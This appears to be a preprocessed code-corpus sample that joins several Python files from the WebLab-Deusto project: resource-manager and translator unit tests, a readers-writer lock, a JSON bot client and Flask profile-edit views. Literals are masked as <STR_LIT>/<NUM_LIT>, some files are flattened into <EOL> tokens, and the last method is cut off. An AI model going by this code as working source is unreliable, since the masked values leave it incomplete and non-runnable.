    def test_list_experiments(self):
        # Two instances of the same experiment type -> one experiment id.
        session = self.session_maker()
        try:
            exp_id1 = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            resource_instance1 = Resource("<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id1, resource_instance1)
            exp_id2 = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            resource_instance2 = Resource("<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id2, resource_instance2)
            session.commit()
        finally:
            session.close()
        resources = self.resources_manager.list_experiments()
        self.assertEquals(<NUM_LIT:1>, len(resources))
        self.assertTrue(ExperimentId('<STR_LIT>', '<STR_LIT>') in resources)

    def test_list_experiment_instance_ids_by_resource(self):
        # Two experiment instances share resource_instance1; a third uses a
        # different resource and must not be listed for it.
        session = self.session_maker()
        try:
            exp_id1 = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            resource_instance1 = Resource("<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id1, resource_instance1)
            exp_id2 = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id2, resource_instance1)
            exp_id3 = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            resource_instance2 = Resource("<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id3, resource_instance2)
            session.commit()
        finally:
            session.close()
        experiment_instance_ids = self.resources_manager.list_experiment_instance_ids_by_resource(resource_instance1)
        self.assertEquals(<NUM_LIT:2>, len(experiment_instance_ids))
        self.assertTrue(ExperimentInstanceId('<STR_LIT>', '<STR_LIT>', '<STR_LIT>') in experiment_instance_ids)
        self.assertTrue(ExperimentInstanceId('<STR_LIT>', '<STR_LIT>', '<STR_LIT>') in experiment_instance_ids)

    def test_list_laboratories_addresses(self):
        # Instances grouped by laboratory address; each address maps its
        # experiment instances to the resources that serve them.
        session = self.session_maker()
        try:
            exp_id1 = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            resource_instance1 = Resource("<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id1, resource_instance1)
            exp_id2 = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            resource_instance2 = Resource("<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id2, resource_instance2)
            exp_id3 = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            resource_instance3 = Resource("<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id3, resource_instance3)
            session.commit()
        finally:
            session.close()
        addresses = self.resources_manager.list_laboratories_addresses()
        self.assertEquals(<NUM_LIT:2>, len(addresses))
        self.assertTrue("<STR_LIT>" in addresses)
        self.assertEquals(<NUM_LIT:2>, len(addresses["<STR_LIT>"]))
        self.assertTrue(exp_id1 in addresses["<STR_LIT>"])
        self.assertTrue(exp_id2 in addresses["<STR_LIT>"])
        self.assertTrue("<STR_LIT>" in addresses)
        self.assertEquals(<NUM_LIT:1>, len(addresses["<STR_LIT>"]))
        self.assertTrue(exp_id3 in addresses["<STR_LIT>"])
        self.assertEquals(resource_instance1, addresses["<STR_LIT>"][exp_id1])
        self.assertEquals(resource_instance2, addresses["<STR_LIT>"][exp_id2])
        self.assertEquals(resource_instance3, addresses["<STR_LIT>"][exp_id3])

    def test_scheduler_reservation_associations(self):
        # Associate two schedulers with reservation1 and one with
        # reservation2, then verify retrieve / dissociate / clean.
        exp_inst_id1 = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
        exp_inst_id1b = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
        exp_inst_id2 = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
        exp_id1 = exp_inst_id1.to_experiment_id()
        exp_id2 = exp_inst_id2.to_experiment_id()
        session = self.session_maker()
        try:
            self.resources_manager.add_resource(session, Resource("<STR_LIT>", "<STR_LIT>"))
            self.resources_manager.add_resource(session, Resource("<STR_LIT>", "<STR_LIT>"))
            self.resources_manager.add_resource(session, Resource("<STR_LIT>", "<STR_LIT>"))
            session.commit()
        finally:
            session.close()
        self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_inst_id1, Resource("<STR_LIT>", "<STR_LIT>"))
        self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_inst_id1b, Resource("<STR_LIT>", "<STR_LIT>"))
        self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_inst_id2, Resource("<STR_LIT>", "<STR_LIT>"))
        reservation1 = '<STR_LIT>'
        reservation2 = '<STR_LIT>'
        self.resources_manager.associate_scheduler_to_reservation(reservation1, exp_id1, '<STR_LIT>')
        self.resources_manager.associate_scheduler_to_reservation(reservation1, exp_id1, '<STR_LIT>')
        self.resources_manager.associate_scheduler_to_reservation(reservation2, exp_id2, '<STR_LIT>')
        resource_type_names = self.resources_manager.retrieve_schedulers_per_reservation(reservation1, exp_id1)
        self.assertEquals(set(('<STR_LIT>', '<STR_LIT>')), set(resource_type_names))
        resource_type_names = self.resources_manager.retrieve_schedulers_per_reservation(reservation2, exp_id2)
        self.assertEquals(['<STR_LIT>'], list(resource_type_names))
        self.resources_manager.dissociate_scheduler_from_reservation(reservation1, exp_id1, '<STR_LIT>')
        resource_type_names = self.resources_manager.retrieve_schedulers_per_reservation(reservation1, exp_id1)
        self.assertEquals(['<STR_LIT>'], list(resource_type_names))
        self.resources_manager.clean_associations_for_reservation(reservation1, exp_id1)
        resource_type_names = self.resources_manager.retrieve_schedulers_per_reservation(reservation1, exp_id1)
        self.assertEquals(<NUM_LIT:0>, len(resource_type_names))


def suite():
    return unittest.makeSuite(ResourcesManagerTestCase)

if __name__ == '<STR_LIT:__main__>':
    unittest.main()
<s> from __future__ import print_function , unicode_literals <EOL> import unittest <EOL> from weblab . data . experiments import ExperimentId , ExperimentInstanceId <EOL> class ExperimentIdsTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . experiment_id = ExperimentId ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . experiment_instance_id = ExperimentInstanceId ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _check_repr ( self , obj ) : <EOL> self . assertEquals ( repr ( obj ) , repr ( eval ( repr ( obj ) ) ) ) <EOL> def test_experiment_id ( self ) : <EOL> self . _check_repr ( self . experiment_id ) <EOL> def test_experiment_instance_id ( self ) : <EOL> self . _check_repr ( self . experiment_instance_id ) <EOL> def suite ( ) : <EOL> return unittest . makeSuite ( ExperimentIdsTestCase ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , unicode_literals <EOL> from weblab . translator . translators import StoresEverythingTranslator <EOL> import test . unit . configuration as configuration_module <EOL> import unittest <EOL> import voodoo . configuration as ConfigurationManager <EOL> class StoresEverythingTranslatorTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . _cfg_manager = ConfigurationManager . ConfigurationManager ( ) <EOL> self . _cfg_manager . append_module ( configuration_module ) <EOL> self . translator = StoresEverythingTranslator ( None , None , self . _cfg_manager ) <EOL> def test ( self ) : <EOL> self . assertEquals ( <EOL> None , <EOL> self . translator . do_on_start ( '<STR_LIT>' ) <EOL> ) <EOL> self . assertEquals ( <EOL> '<STR_LIT>' , <EOL> self . translator . do_before_send_command ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> self . assertEquals ( <EOL> '<STR_LIT>' , <EOL> self . translator . do_after_send_command ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> self . assertEquals ( <EOL> '<STR_LIT:file>' , <EOL> self . translator . do_before_send_file ( '<STR_LIT>' , '<STR_LIT:file>' ) <EOL> ) <EOL> self . assertEquals ( <EOL> '<STR_LIT>' , <EOL> self . translator . do_after_send_file ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> self . assertEquals ( <EOL> None , <EOL> self . translator . do_on_finish ( '<STR_LIT>' ) <EOL> ) <EOL> def suite ( ) : <EOL> return unittest . makeSuite ( StoresEverythingTranslatorTestCase ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
from __future__ import print_function, unicode_literals

import threading
import time

# Module-level counter; never referenced in this module — possibly a leftover.
NUM = <NUM_LIT:0>


def locked(lock_name='<STR_LIT>'):
    """Decorator factory: run the wrapped method while holding self.<lock_name>.

    The lock object is looked up by attribute name on each call, so the
    decorated class only needs to expose an object with an
    acquire()/release() pair under that attribute name.
    """
    def locked_with_name(func):
        def wrapped_locked(self, *args, **kargs):
            the_lock = getattr(self, lock_name)
            the_lock.acquire()
            try:
                return func(self, *args, **kargs)
            finally:
                # Always released, even if func raises.
                the_lock.release()
        # Metadata propagated by hand (functools.wraps is not used here).
        wrapped_locked.__name__ = func.__name__
        wrapped_locked.__doc__ = func.__doc__
        return wrapped_locked
    return locked_with_name


class UnfairLock(object):
    """Lock acquired by polling with a non-blocking try + sleep.

    Unlike a plain threading.Lock, waiters are not queued by the runtime:
    whichever thread happens to poll first after a release wins — hence
    "unfair".
    """

    # Sleep interval between acquisition attempts, in seconds.
    SLICE = <NUM_LIT>

    def __init__(self):
        self._lock = threading.Lock()

    def acquire(self):
        # Busy-wait: non-blocking attempt, then sleep a slice and retry.
        while True:
            acquired = self._lock.acquire(False)
            if acquired:
                return
            time.sleep(self.SLICE)

    def release(self):
        self._lock.release()


class _InternalReadLock(object):
    """Facade exposing RWLock's reader side as an acquire()/release() pair."""

    def __init__(self, rwlock):
        self.rwlock = rwlock

    def acquire(self):
        self.rwlock._acquire_reading()

    def release(self):
        self.rwlock._release_reading()


class _InternalWriteLock(object):
    """Facade exposing RWLock's writer side as an acquire()/release() pair."""

    def __init__(self, rwlock):
        self.rwlock = rwlock

    def acquire(self):
        self.rwlock._acquire_writing()

    def release(self):
        self.rwlock._release_writing()


class RWLock(object):
    """Readers-writer lock: many concurrent readers, one (reentrant) writer.

    State, guarded by self._lock via the @locked() decorator:
      * self._reading — number of threads currently holding the read lock.
      * self._writing — None, or [writer_thread, reentrancy_count].
    Waiting/wake-up is coordinated through self._condition.
    """

    # Not referenced in this class — NOTE(review): appears unused; confirm.
    _SHORT_TIME = <NUM_LIT>

    def __init__(self):
        # _lock is the attribute the @locked() decorator acquires —
        # NOTE(review): assumes the masked default lock_name is '_lock'.
        self._lock = threading.RLock()
        self._read_lock = _InternalReadLock(self)
        self._write_lock = _InternalWriteLock(self)
        self._condition = threading.Condition()
        self._reading = <NUM_LIT:0>
        self._writing = None

    @locked()
    def _get_reading(self):
        return self._reading

    @locked()
    def _increment_reading(self):
        self._reading += <NUM_LIT:1>

    @locked()
    def _decrement_reading(self):
        self._reading -= <NUM_LIT:1>

    @locked()
    def _set_writing(self):
        # Current thread becomes the writer with reentrancy count 1.
        self._writing = [threading.currentThread(), <NUM_LIT:1>]

    @locked()
    def _decrement_writing(self):
        # Drop one reentrancy level; fully release when the count hits zero.
        self._writing[<NUM_LIT:1>] = self._writing[<NUM_LIT:1>] - <NUM_LIT:1>
        if self._writing[<NUM_LIT:1>] == <NUM_LIT:0>:
            self._writing = None

    @locked()
    def _is_writing(self):
        return self._writing != None

    @locked()
    def _someone_else_is_writing(self):
        return self._writing != None and self._writing[<NUM_LIT:0>] != threading.currentThread()

    @locked()
    def _am_i_writing(self):
        # CAUTION: not a pure query — when the current thread already holds
        # the write lock, this also bumps the reentrancy count by one.
        # _acquire_writing relies on that side effect for reentrant acquires.
        am_i = self._writing != None and self._writing[<NUM_LIT:0>] == threading.currentThread()
        if am_i:
            self._writing[<NUM_LIT:1>] = self._writing[<NUM_LIT:1>] + <NUM_LIT:1>
        return am_i

    def _acquire_reading(self):
        # Readers only wait while a *different* thread holds the write lock;
        # the writer thread itself may also read.
        self._condition.acquire()
        try:
            while self._someone_else_is_writing():
                self._condition.wait()
            self._increment_reading()
            self._condition.notifyAll()
        finally:
            self._condition.release()

    def _acquire_writing(self):
        self._condition.acquire()
        try:
            # Reentrant case: _am_i_writing() already incremented the count.
            if not self._am_i_writing():
                # Otherwise wait until there are no readers and no writer.
                while self._get_reading() > <NUM_LIT:0> or self._is_writing():
                    self._condition.wait()
                self._set_writing()
            self._condition.notifyAll()
        finally:
            self._condition.release()

    def _release_reading(self):
        self._condition.acquire()
        try:
            self._decrement_reading()
            self._condition.notifyAll()
        finally:
            self._condition.release()

    def _release_writing(self):
        self._condition.acquire()
        try:
            self._decrement_writing()
            self._condition.notifyAll()
        finally:
            self._condition.release()

    def read_lock(self):
        """Return the reader facade (acquire()/release() object)."""
        return self._read_lock

    def write_lock(self):
        """Return the writer facade (acquire()/release() object)."""
        return self._write_lock
<s> from __future__ import print_function , unicode_literals <EOL> import time <EOL> import traceback <EOL> import urllib2 <EOL> from functools import wraps <EOL> import json <EOL> import cookielib <EOL> import voodoo . sessions . session_id as SessionId <EOL> import weblab . core . reservations as Reservation <EOL> from weblab . core . new_server import simplify_response <EOL> import weblab . data . command as Command <EOL> from weblab . data . dto . experiments import Experiment , ExperimentClient , ExperimentCategory <EOL> from weblab . data . dto . users import User <EOL> from exc import InvalidUserOrPasswordError <EOL> from exc import ListOfExperimentsIsEmptyError <EOL> class Call ( object ) : <EOL> def __init__ ( self , begin , end , method , args , kargs , return_value , ( exception , trace ) ) : <EOL> super ( Call , self ) . __init__ ( ) <EOL> self . begin = begin <EOL> self . end = end <EOL> self . method = method <EOL> self . args = args <EOL> self . kargs = kargs <EOL> self . return_value = return_value <EOL> self . exception = ( exception , trace ) <EOL> def time ( self ) : <EOL> return self . end - self . begin <EOL> def get_exception ( self ) : <EOL> return self . exception <EOL> def __str__ ( self ) : <EOL> text = "<STR_LIT>" % ( self . method , self . time ( ) , self . begin , self . end ) <EOL> text += "<STR_LIT>" % str ( self . args ) <EOL> text += "<STR_LIT>" % str ( self . kargs ) <EOL> text += "<STR_LIT>" % self . return_value <EOL> text += "<STR_LIT>" % str ( self . exception [ <NUM_LIT:0> ] ) <EOL> return text <EOL> def logged ( func ) : <EOL> @ wraps ( func ) <EOL> def wrapper ( self , * args , ** kargs ) : <EOL> try : <EOL> begin = time . time ( ) <EOL> try : <EOL> return_value = func ( self , * args , ** kargs ) <EOL> except Exception as e : <EOL> return_value = None <EOL> exception_and_trace_raised = ( e , traceback . format_exc ( ) ) <EOL> if self . 
raise_exceptions : <EOL> raise <EOL> else : <EOL> exception_and_trace_raised = ( None , None ) <EOL> return return_value <EOL> finally : <EOL> end = time . time ( ) <EOL> self . _add_call ( begin , end , func . __name__ . lstrip ( "<STR_LIT>" ) , args , kargs , return_value , exception_and_trace_raised ) <EOL> return wrapper <EOL> def possibleKeyError ( func ) : <EOL> @ wraps ( func ) <EOL> def wrapper ( self , * args , ** kargs ) : <EOL> try : <EOL> return func ( self , * args , ** kargs ) <EOL> except KeyError : <EOL> raise Exception ( "<STR_LIT>" % ( func . __name__ , str ( args ) , str ( kargs ) ) ) <EOL> return wrapper <EOL> class AbstractBot ( object ) : <EOL> def __init__ ( self , url , url_login ) : <EOL> super ( AbstractBot , self ) . __init__ ( ) <EOL> self . session_id = "<STR_LIT>" <EOL> self . calls = [ ] <EOL> self . begin = <NUM_LIT:0> <EOL> self . end = <NUM_LIT:0> <EOL> self . url = url <EOL> self . url_login = url_login <EOL> self . remote_url = None <EOL> self . remote_reservation_id = None <EOL> self . raise_exceptions = False <EOL> def _add_call ( self , begin , end , method , args , kargs , return_value , ( exception , trace ) ) : <EOL> self . calls . append ( Call ( begin , end , method , args , kargs , return_value , ( exception , trace ) ) ) <EOL> def start ( self ) : <EOL> self . begin = time . time ( ) <EOL> def finish ( self ) : <EOL> self . end = time . time ( ) <EOL> self . dispose ( ) <EOL> def dispose ( self ) : <EOL> pass <EOL> def time ( self ) : <EOL> return self . end - self . begin <EOL> def get_number_of_exceptions ( self ) : <EOL> return len ( [ call . get_exception ( ) for call in self . calls if call . get_exception ( ) != ( None , None ) ] ) <EOL> def get_exceptions ( self ) : <EOL> return [ call . get_exception ( ) for call in self . calls if call . get_exception ( ) != ( None , None ) ] <EOL> def get_calls ( self ) : <EOL> return self . 
calls [ : ] <EOL> def get_calls_by_name ( self ) : <EOL> by_name = { } <EOL> for call in self . calls : <EOL> if call . method in by_name : <EOL> by_name [ call . method ] . append ( call ) <EOL> else : <EOL> by_name [ call . method ] = [ call ] <EOL> return by_name <EOL> def get_log ( self ) : <EOL> text = "<STR_LIT>" <EOL> for call in self . calls : <EOL> text += "<STR_LIT:\n>" + str ( call ) + "<STR_LIT:\n>" <EOL> return text <EOL> @ logged <EOL> def do_login ( self , username , password ) : <EOL> session_holder = self . _call ( '<STR_LIT>' , username = username , password = password ) <EOL> self . session_id = self . _parse_session_id ( session_holder ) <EOL> if self . session_id is not None : <EOL> return self . session_id <EOL> else : <EOL> raise InvalidUserOrPasswordError ( "<STR_LIT>" % ( self . username , self . password ) ) <EOL> @ logged <EOL> def do_list_experiments ( self ) : <EOL> experiment_list_holders = self . _call ( '<STR_LIT>' , session_id = self . session_id ) <EOL> experiments = self . _parse_experiment_list_holders ( experiment_list_holders ) <EOL> if len ( experiments ) > <NUM_LIT:0> : <EOL> return experiments <EOL> else : <EOL> raise ListOfExperimentsIsEmptyError ( "<STR_LIT>" ) <EOL> @ logged <EOL> def do_reserve_experiment ( self , experiment_id , client_initial_data , consumer_data ) : <EOL> reservation_holder = self . _call ( '<STR_LIT>' , session_id = self . session_id , experiment_id = experiment_id , client_initial_data = client_initial_data , consumer_data = consumer_data ) <EOL> reservation = self . _parse_reservation_holder ( reservation_holder ) <EOL> if isinstance ( reservation , Reservation . ConfirmedReservation ) and reservation . remote_reservation_id is not None and reservation . remote_reservation_id != '<STR_LIT>' : <EOL> self . remote_url = reservation . url <EOL> self . remote_reservation_id = reservation . remote_reservation_id <EOL> else : <EOL> self . remote_url = None <EOL> self . 
remote_reservation_id = None <EOL> self . reservation_id = reservation . reservation_id <EOL> return reservation <EOL> @ logged <EOL> def do_get_reservation_status ( self ) : <EOL> reservation_holder = self . _call ( '<STR_LIT>' , reservation_id = self . reservation_id ) <EOL> reservation = self . _parse_reservation_holder ( reservation_holder ) <EOL> if isinstance ( reservation , Reservation . ConfirmedReservation ) and reservation . remote_reservation_id is not None and reservation . remote_reservation_id != '<STR_LIT>' : <EOL> self . remote_url = reservation . url <EOL> self . remote_reservation_id = reservation . remote_reservation_id <EOL> else : <EOL> self . remote_url = None <EOL> self . remote_reservation_id = None <EOL> return reservation <EOL> @ logged <EOL> def do_logout ( self ) : <EOL> return self . _call ( '<STR_LIT>' , session_id = self . session_id ) <EOL> @ logged <EOL> def do_finished_experiment ( self ) : <EOL> return self . _call ( '<STR_LIT>' , reservation_id = self . reservation_id ) <EOL> @ logged <EOL> def do_send_file ( self , structure , file_info ) : <EOL> reservation_id = self . remote_reservation_id if self . remote_reservation_id is not None else self . reservation_id <EOL> command_holder = self . _call ( '<STR_LIT>' , reservation_id = reservation_id , file_content = structure , file_info = file_info ) <EOL> command = self . _parse_command ( command_holder ) <EOL> return command <EOL> @ logged <EOL> def do_send_command ( self , command ) : <EOL> reservation_id = self . remote_reservation_id if self . remote_reservation_id is not None else self . reservation_id <EOL> command_holder = self . _call ( '<STR_LIT>' , reservation_id = reservation_id , command = command ) <EOL> command = self . _parse_command ( command_holder ) <EOL> return command <EOL> @ logged <EOL> def do_poll ( self ) : <EOL> reservation_id = self . remote_reservation_id if self . remote_reservation_id is not None else self . reservation_id <EOL> return self . 
_call ( '<STR_LIT>' , reservation_id = reservation_id ) <EOL> @ logged <EOL> def do_get_user_information ( self ) : <EOL> holder = self . _call ( '<STR_LIT>' , session_id = self . session_id ) <EOL> return self . _parse_user ( holder ) <EOL> @ logged <EOL> def do_get_user_permissions ( self ) : <EOL> holder = self . _call ( '<STR_LIT>' , session_id = self . session_id ) <EOL> return self . _parse_user ( holder ) <EOL> class AbstractBotDict ( AbstractBot ) : <EOL> def __init__ ( self , url , url_login ) : <EOL> super ( AbstractBotDict , self ) . __init__ ( url , url_login ) <EOL> def _parse_session_id ( self , session_holder ) : <EOL> return SessionId . SessionId ( session_holder [ '<STR_LIT:id>' ] ) <EOL> @ possibleKeyError <EOL> def _parse_experiment_list_holders ( self , experiment_list_holders ) : <EOL> experiments = [ ] <EOL> for experiment in [ holder [ '<STR_LIT>' ] for holder in experiment_list_holders ] : <EOL> category = ExperimentCategory ( experiment [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] ) <EOL> client = ExperimentClient ( experiment [ '<STR_LIT>' ] [ '<STR_LIT>' ] , experiment [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> exp = Experiment ( experiment [ '<STR_LIT:name>' ] , category , experiment [ '<STR_LIT>' ] , experiment [ '<STR_LIT>' ] , client ) <EOL> experiments . append ( exp ) <EOL> return experiments <EOL> @ possibleKeyError <EOL> def _parse_reservation_holder ( self , reservation_holder ) : <EOL> if reservation_holder . get ( '<STR_LIT>' ) is None : <EOL> remote_reservation_id = None <EOL> else : <EOL> remote_reservation_id = reservation_holder . get ( '<STR_LIT>' ) . get ( '<STR_LIT:id>' ) <EOL> return Reservation . Reservation . translate_reservation_from_data ( reservation_holder [ '<STR_LIT:status>' ] , reservation_holder [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , reservation_holder . get ( '<STR_LIT>' ) , reservation_holder . get ( '<STR_LIT:time>' ) , reservation_holder . get ( '<STR_LIT>' ) , reservation_holder . 
get ( '<STR_LIT>' ) , reservation_holder . get ( '<STR_LIT:url>' ) , reservation_holder . get ( '<STR_LIT>' ) , reservation_holder . get ( '<STR_LIT>' ) , remote_reservation_id ) <EOL> @ possibleKeyError <EOL> def _parse_user ( self , holder ) : <EOL> return User ( holder [ '<STR_LIT>' ] , holder [ '<STR_LIT>' ] , holder [ '<STR_LIT:email>' ] , holder [ '<STR_LIT>' ] ) <EOL> @ possibleKeyError <EOL> def _parse_command ( self , command_holder ) : <EOL> command = Command . Command ( command_holder [ '<STR_LIT>' ] ) <EOL> return command <EOL> class BotJSON ( AbstractBotDict ) : <EOL> def __init__ ( self , url , url_login ) : <EOL> super ( BotJSON , self ) . __init__ ( url , url_login ) <EOL> self . cj = cookielib . CookieJar ( ) <EOL> self . opener = urllib2 . build_opener ( urllib2 . HTTPCookieProcessor ( self . cj ) ) <EOL> self . weblabsessionid = "<STR_LIT>" <EOL> def _call ( self , method , ** kwargs ) : <EOL> params = { } <EOL> for key in kwargs : <EOL> parsed_response = simplify_response ( kwargs [ key ] ) <EOL> params [ key ] = parsed_response <EOL> whole_request = json . dumps ( { <EOL> "<STR_LIT>" : method , <EOL> "<STR_LIT>" : params <EOL> } ) <EOL> avoid_sessionid = False <EOL> if method == '<STR_LIT>' : <EOL> uopen = self . opener . open ( self . url_login , data = whole_request ) <EOL> elif method in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if self . remote_url is None : <EOL> uopen = self . opener . open ( self . url , data = whole_request ) <EOL> else : <EOL> avoid_sessionid = True <EOL> opener = urllib2 . build_opener ( ) <EOL> opener . addheaders . append ( ( '<STR_LIT>' , '<STR_LIT>' % self . remote_reservation_id . id . split ( '<STR_LIT:;>' ) [ <NUM_LIT:1> ] ) ) <EOL> uopen = opener . open ( self . remote_url + '<STR_LIT>' , data = whole_request ) <EOL> else : <EOL> uopen = self . opener . open ( self . url , data = whole_request ) <EOL> content = uopen . read ( ) <EOL> if not avoid_sessionid : <EOL> cookies = [ c for c in self . 
cj if c . name == '<STR_LIT>' ] <EOL> if len ( cookies ) > <NUM_LIT:0> : <EOL> self . weblabsessionid = cookies [ <NUM_LIT:0> ] . value <EOL> response = json . loads ( content ) <EOL> if response . get ( '<STR_LIT>' , False ) : <EOL> raise Exception ( response [ "<STR_LIT:message>" ] ) <EOL> return response [ '<STR_LIT:result>' ] <EOL> def dispose ( self ) : <EOL> self . opener = None <EOL> self . cj = None <EOL> def create_bot ( name , url , url_login ) : <EOL> if name == '<STR_LIT>' : <EOL> return BotJSON ( url , url_login ) <EOL> raise NotImplementedError ( "<STR_LIT>" % name ) </s>
from __future__ import print_function, unicode_literals

import sha
import random

from flask import redirect, request, flash, url_for
from flask.ext.admin import expose

from weblab.admin.web.util import WebLabAdminIndexView, WebLabBaseView
import weblab.db.model as model
from weblab.admin.util import password2sha
import weblab.admin.web.admin_views as admin_views

from wtforms import TextField, PasswordField
from wtforms.validators import NumberRange
from flask.ext.wtf import Form

from weblab.admin.web.fields import DisabledTextField
from weblab.core.i18n import gettext, lazy_gettext
import weblab.permissions as permissions


def get_app_instance(view):
    """Return the WebLab application object attached to the view's Admin."""
    return view.admin.weblab_admin_app


class ProfileEditForm(Form):
    """Form for the "edit my profile" page.

    full_name and login are rendered read-only (DisabledTextField); only the
    email, facebook id and password fields can actually be edited.
    """
    full_name = DisabledTextField(lazy_gettext("<STR_LIT>"))
    login = DisabledTextField(lazy_gettext(u"<STR_LIT>"))
    email = TextField(lazy_gettext(u"<STR_LIT>"))
    # NumberRange(min=1000) — presumably filters out obviously invalid
    # facebook numeric ids; TODO confirm the intended lower bound.
    facebook = TextField(lazy_gettext(u"<STR_LIT>"), description=lazy_gettext("<STR_LIT>"), validators=[NumberRange(min=<NUM_LIT:1000>)])
    password = PasswordField(lazy_gettext(u"<STR_LIT>"), description=lazy_gettext("<STR_LIT>"))


class ProfileEditView(WebLabBaseView):
    """GET/POST view where the logged-in user edits their own profile."""

    def __init__(self, db_session, *args, **kwargs):
        super(ProfileEditView, self).__init__(*args, **kwargs)
        self._session = db_session

    @expose(methods=['<STR_LIT:GET>', '<STR_LIT:POST>'])
    def index(self):
        # Load the current user's DB record.
        login = get_app_instance(self).get_user_information().login
        user = self._session.query(model.DbUser).filter_by(login=login).one()
        facebook_id = '<STR_LIT>'
        change_password = True
        password_auth = None
        facebook_auth = None
        # Scan the user's auth mechanisms: find the facebook auth (if any),
        # the password auth, and whether password changes are disallowed
        # (e.g. externally-managed credentials).
        for user_auth in user.auths:
            if user_auth.auth.auth_type.name.lower() == '<STR_LIT>':
                facebook_id = user_auth.configuration
                facebook_auth = user_auth
            if '<STR_LIT>' in user_auth.auth.auth_type.name.lower():
                change_password = False
            if user_auth.auth.auth_type.name.lower() == '<STR_LIT>':
                password_auth = user_auth
        if len(request.form):
            # POST: bind the submitted data.
            form = ProfileEditForm(request.form)
        else:
            # GET: pre-populate the form from the DB record.
            form = ProfileEditForm()
            form.full_name.data = user.full_name
            form.login.data = user.login
            form.email.data = user.email
            form.facebook.data = facebook_id
        # A CANT_CHANGE_PROFILE permission locks the whole page down.
        user_permissions = get_app_instance(self).get_permissions()
        change_profile = True
        for permission in user_permissions:
            if permission.name == permissions.CANT_CHANGE_PROFILE:
                change_password = False
                change_profile = False
        if change_profile and form.validate_on_submit():
            errors = []
            # Password: only when allowed, a password auth exists, and a new
            # value was actually submitted.
            if change_password and password_auth is not None and form.password.data:
                if len(form.password.data) < <NUM_LIT:6>:
                    errors.append(gettext("<STR_LIT>"))
                else:
                    password_auth.configuration = password2sha(form.password.data)
            user.email = form.email.data
            # Facebook id: create, update or delete the facebook auth row.
            if form.facebook.data:
                if facebook_auth is None:
                    auth = self._session.query(model.DbAuth).filter_by(name='<STR_LIT>').one()
                    new_auth = model.DbUserAuth(user, auth, form.facebook.data)
                    self._session.add(new_auth)
                else:
                    facebook_auth.configuration = form.facebook.data
            else:
                if facebook_auth is not None:
                    self._session.delete(facebook_auth)
            # NOTE(review): commit happens even when errors were collected —
            # email/facebook changes are persisted regardless; confirm intent.
            self._session.commit()
            if errors:
                for error in errors:
                    flash(error)
            else:
                flash(gettext("<STR_LIT>"))
        return self.render("<STR_LIT>", form=form, change_password=change_password, change_profile=change_profile)

    def is_accessible(self):
        # Only available to authenticated users.
        return get_app_instance(self).get_user_information() is not None

    def _handle_view(self, name, **kwargs):
        # Redirect anonymous users to the login page, preserving the target.
        if not self.is_accessible():
            return redirect(url_for('<STR_LIT>', next=request.url))
        return super(ProfileEditView, self)._handle_view(name, **kwargs)


class MyAccessesPanel(admin_views.UserUsedExperimentPanel):
    """Read-only panel listing the current user's own experiment uses.

    Reuses the admin panel but filters every query down to the logged-in user.
    """

    column_list = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
    column_filters = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
    column_labels = dict(experiment=lazy_gettext("<STR_LIT>"), start_date=lazy_gettext("<STR_LIT>"), end_date=lazy_gettext("<STR_LIT>"), origin=lazy_gettext("<STR_LIT>"), details=lazy_gettext("<STR_LIT>"))

    def is_accessible(self):
        return get_app_instance(self).get_user_information() is not None

    def _apply_filters(self, query):
        # NOTE(review): this local shadows the module-level `permissions`
        # import and its value is never used — looks like dead code.
        permissions = get_app_instance(self).get_permissions()
        user_information = get_app_instance(self).get_user_information()
        user = self.session.query(model.DbUser).filter_by(login=user_information.login).one()
        # Restrict the listing to the current user's rows.
        return query.filter_by(user=user)

    def get_query(self):
        query = super(MyAccessesPanel, self).get_query()
        return self._apply_filters(query)

    def get_count_query(self):
        query = super(MyAccessesPanel, self).get_count_query()
        return self._apply_filters(query)

    def get_files_query(self, id):
